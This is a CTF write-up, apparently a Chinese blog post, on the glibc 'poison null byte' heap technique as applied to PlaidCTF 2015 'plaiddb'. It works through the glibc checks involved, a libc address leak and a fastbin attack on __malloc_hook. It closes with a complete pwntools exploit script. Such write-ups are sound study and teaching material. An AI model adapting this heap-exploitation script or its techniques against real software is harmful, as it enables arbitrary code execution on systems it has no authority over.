Poison null byte#
关于堆块重叠,可以看这篇文章,图文并茂。
glibc2.26中,在unlink宏中加入了size==prev_size(next_chunk)
的检查,与下一chunk所存储的pre_size进行了比对,在poison_null_byte.c
中相应的添加了*(size_t*)(b+0x1f0) = 0x200
,可以绕过这个检查,所以how2heap的README中对glibc的要求是<2.26
应该是忘了改。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| chunk b +------> +----------+
| |
+----------+ <---------+ size
| 0X200 |
+----------+ <---------+ b
| |
| |
| |
| |
| |
| |
| |
| |
| |
+----------+ <--------+ fake pre_size
| 0X200 |
+----------+
| |
chunk c +------> +----------+ <--------+ pre_size
| 0X210 |
+----------+
| |
| |
| |
|
触发unlink的流程:通过null byte溢出伪造完0x200的chunk后,此时该chunk存在于unsortedbin。再次分配0x100的b1时,遍历unsortedbin,该chunk被放入到smallbin中,unsortedbin里的chunk也就这一个,遍历结束无法分配。又通过查找binmap找到0x200的smallbin,这时触发的unlink,将该chunk从smallbin中取出。
原来我以为在unsortedbin中就直接split分配了,没有unlink操作,实际不是。
只有是last remainder且大小足够大,或exact fit才会直接进行分配,否则就只是将chunk各归其位。
1
2
3
4
5
6
7
8
9
10
| // split
if (in_smallbin_range (nb) &&
bck == unsorted_chunks (av) &&
victim == av->last_remainder &&
(unsigned long) (size) > (unsigned long) (nb + MINSIZE))
.... // split 然后分配
/* Take now instead of binning if exact fit */
if (size == nb)
... // 直接分配
|
Plaidctf2015 plaiddb#
analysis#
1
2
3
4
5
6
| Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
|
关键数据结构
据说是用红黑树进行的节点的管理,我没看懂….只能看出来是个树,好在这不影响做题。
功能
这个程序有GET、PUT、DUMP、DEL、EXIT几个指令,主要关注PUT、DEL就好。
GET:输入节点key,输出
PUT:创建节点,输入key,content大小(也就是节点size),和content
DUMP:打印所有节点
DEL:通过key查找节点并删除
涉及的分配与释放操作
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| main:
malloc(0x38)
malloc(0x8)
malloc(0x9)
PUT:
malloc(0x38)
malloc(0x...) func my_readline
malloc(size) content
DEL:
malloc(0x...) func my_readline
free(key)
free(content)
free(data_struct)
free(readline) # 找不到该key,将不会释放。内存泄漏
|
其中程序中的my_readline(我给起的名)函数,分配变长字节的空间,不够的就realloc(2*usable_size)
,所以它存在usable_size:0x18、0x38、0x78、0xf8、0x1f8…这样的分配序列。
同时该函数尾部存在null byte溢出。
poison null byte && memory leak#
memory leak: DEL函数中,my_readline中malloc的空间存储key,该key在没有找到的情况下,不会被释放。
我通过学习(copy)ctf-wiki中的解法,自己整了一套size。
1
2
3
4
5
6
7
8
9
10
11
12
| +------------+
| 1 | <-- 0x110
+------------+
| 2 | <-- 0xe0
+------------+
| 3 | <-- 0x70
+------------+
| 4 | <-- 0x100
+------------+
| 5 | <-- 0x100
+------------+
| X | <-- 任意分配后 chunk 防止 top 合并
|
上面写的大小都是chunk size,包含chunk头。
通过叙说过程,说明其各个chunk的作用。
依次分配1~5空间连续的chunk,释放1、3、4,顺序不重要。
4的大小就是my_readline的usable_size等于0xf8的情况,使用my_readline溢出覆盖chunk5->pre_size
为0x360,也就是0x110+0xe0+0x70+0x100, 和覆盖chunk5->size
的最低字节为0x00。
而此次malloc不会被释放,所以也就不会被_int_free
函数报错。
释放chunk5,它会向前合并为0x460的块,放入unsortedbin中。
再次分配chunk1大小也就是0x100,就会将0x460切割,剩下的放回unsortedbin。这样就会在chunk2内就会被写入fd和bk,通过打印chunk2就可以获得unsortedbin的位于main_arena上的地址,也就知道了libc base。
chunk3在0x70的fastbin内安然无恙,再次分配在0xf0,覆盖chunk3的fd指针为__malloc_hook-0x3
,两次分配0x68,写入one_gadget。(也就是fastbin attack)
fastbin attack#
fastbin的fd指针不能随便覆盖,因为fastbin在分配过程中有以下检查。
1
2
3
4
| // glibc release/2.26/master 3599~3601
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
malloc_printerr ("malloc(): memory corruption (fast)");
|
对将要使用的chunk进行size检查,chunksize宏将size低三位置0,fastbin_index宏在64位中忽略size低四位。
1
2
3
4
5
6
7
8
9
10
| // glibc release/2.26/master 1289~1292
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
// glibc release/2.26/master 1600~1602
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
|
所以使用0x7f可以绕过该检查,在内存中libc的最高位字节通常就是0x7f。
利用偏移将0x7f置于chunk->size的位置,伪造0x70的fastbin。如下图所示,将0x7fa03fe51bdd当成chunk的起始地址。这种手法据说在支持非对齐寻址的CISC指令集CPU中才可以,例如X86。
覆盖chunk2的fd后。
exploit#
先前看ctf-wiki刚接触heap的时候,就遇到这题,真是花了我好长时间整明白。今天在how2heap里又遇到,使用了glibc2.26进行了测试,exp依旧可以,只需要改下偏移就可以。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
| #!/usr/bin/env python3
# for glibc 2.26 no-tcache
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
ready = False
if ready:
pass
else:
io = process("./datastore")
libc = ELF("../glibc_versions/2.26/x64_notcache/lib/libc-2.26.so")
def cmd(command):
io.recvuntil("Enter command:\n")
io.sendline(command)
def get(key):
cmd("GET")
io.recvuntil("Enter row key:\n")
io.sendline(key)
io.recvuntil("[")
num = int(io.recvuntil(" bytes").strip(b" bytes"))
io.recvuntil(':\n')
return io.recv(num)
def put(key, size, content):
cmd("PUT")
io.recvuntil("Enter row key:\n")
io.sendline(key)
io.recvuntil("Enter data size:\n")
io.sendline(str(size))
io.recvuntil("Enter data:\n")
if len(content) < size:
content = content.ljust(size, b"\x00")
io.send(content)
def delete(key):
cmd("DEL")
io.recvuntil("Enter row key:\n")
io.sendline(key)
delete("th3fl4g")
# 分配足量0x38空闲块,避免影响后面分配连续的空间
for i in range(10):
put(str(i), 0x38, b"padding")
for i in range(10):
delete(str(i))
put("1", 0x100, b"1")
put("2", 0xd0, b"2")
put("3", 0x60, b"3")
put("4", 0xf0, b"4")
put("5", 0xf0, b"5")
put("top", 0x400, b"padding to top")
delete("1")
delete("3")
delete("4")
delete(b"a" * 0xf0 + p64(0x360)) # poison null byte
delete("5")
gdb.attach(io, "b *$rebase(0x1A20)")
put("0x330", 0x330, b"padding") # 前面的0x38块出现合并,分配出去,避免影响后续
put("0x100", 0x100, b"padding")
libc_base = u64(get("2")[:6].ljust(8, b"\x00")) - 0x3ABC60
log.info("libc_base: 0x%x" % libc_base)
put("prepare", 0xf0, b"a" * 0xd8 + p64(0x71) + p64(libc_base + libc.symbols["__malloc_hook"] - 0x10 - 3)) # fastbin attack
put("0x68", 0x68, b"padding")
put("attack", 0x68, b"a" * 3 + p64(libc_base + 0x40dd6))
delete("a")
io.interactive()
|
glibc2.23 exp
Ref#
- https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/off_by_one-zh/#2-plaidctf-2015-plaiddb
- https://4ngelboy.blogspot.com/2016/10/span-display-block-overflow-hidden_10.html